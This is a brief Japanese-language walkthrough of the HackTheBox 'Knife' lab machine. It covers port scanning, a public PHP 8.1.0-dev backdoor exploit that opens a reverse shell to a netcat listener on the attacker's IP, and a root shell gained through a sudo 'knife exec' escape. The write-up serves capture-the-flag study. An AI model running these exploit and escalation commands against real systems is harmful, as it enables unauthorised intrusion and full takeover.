HackTheBox - Knife Walkthrough


Knife

Enum

まずはポートスキャンを行う。

$ sudo nmap -sS -f -A -Pn $IP -o nmap.log

22番ポートと80番ポートが開いているので80番から見ていく。

サイト内の開発ツールを開いたところPHP8.10が使われていることが分かるのでこれのexploitを調べてみるとRCEの脆弱性が見つかった。

Penetration

下記のexploitを用いて侵入を試みる。

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

ncで待ち受ける。

$ nc -lvp 4444

ターゲットurl、ホストIP、ホストポート番号を指定してexploitを実行。

$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.14.3 4444

侵入成功。

Privilege escalation

とりあえずsudo権限で実行出来るコマンドを見ていく。

$ sudo -l

knifeコマンドがsudo権限で実行出来るのでGTFOBinsで調べてみると権限昇格の手法が見つかるのでそれを試す。

$ sudo knife exec -E 'exec "/bin/sh"'

権限昇格成功。